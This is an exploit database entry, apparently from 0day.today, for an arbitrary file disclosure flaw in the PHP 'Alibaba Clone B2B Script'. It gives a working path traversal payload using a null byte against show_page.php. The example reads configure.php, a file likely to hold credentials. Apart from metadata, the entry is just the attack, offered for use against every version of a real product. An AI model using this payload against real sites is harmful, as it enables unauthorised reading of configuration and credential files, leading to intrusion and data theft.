Alibaba Clone B2B Script - Arbitrary File Disclosure

2016-06-23T00:00:00
ID 1337DAY-ID-25134
Type zdt
Reporter Meisam Monsef
Modified 2016-06-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
# Date: 2016-06-22
# Exploit Author: Meisam Monsef [email protected] or [email protected]
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions
# Tested on: CentOS and Windows
 
Exploit :
http://site/show_page.php?page=../[FilePath]%00
 
Example :
http://site/show_page.php?page=../configure.php%00

#  0day.today [2018-03-02]  #